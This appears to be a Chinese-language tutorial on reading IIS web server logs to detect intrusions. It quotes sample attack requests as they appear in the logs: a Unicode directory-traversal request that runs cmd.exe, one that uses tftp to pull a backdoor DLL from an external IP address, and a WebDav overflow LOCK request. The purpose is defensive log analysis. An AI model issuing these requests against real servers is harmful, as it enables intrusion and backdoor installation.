如何利用日志分析抵制外部入侵

核心提示： 我们配合入侵来看下这样的记录：通过下面的编码我们在入侵的时候可以查看目标机的目录文件： GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 则日志中会记录下此访问行为： 2004-04-19 08:

我们配合入侵来看下这样的记录：通过下面的编码我们在入侵的时候可以查看目标机的目录文件：

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

则日志中会记录下此访问行为：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

看到了吗？我们的日志中记录地一清二楚，来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll

502 –

看到了吧？记录非常详细的，系统里面那个程序在响应都记录了下来，这样我们分析入侵行为就好办了。

（2）WebDavx3远程溢出日志记录

过去一段时间有名的Wevdavx3漏洞是应用最广泛的，如果系统遭受了此远程溢出的攻击行为，则日志记录如图二所示。

2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK

/AAAAA……

这表示我们的Web服务受到了来自192.168.0.218的攻击，并锁定(即关闭)了WEB服务，后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。

上面的几种日杂都记录了有入侵行为的IP地址，但此IP地址说不定就是攻击者使用了跳板，也就是说此IP很可能是“肉鸡”而不是攻击者的IP，遇到这样的情况，我们再查看其他日志文件，还是有可能追查出攻击者的位置的，但这个就完全靠管理员的经验了。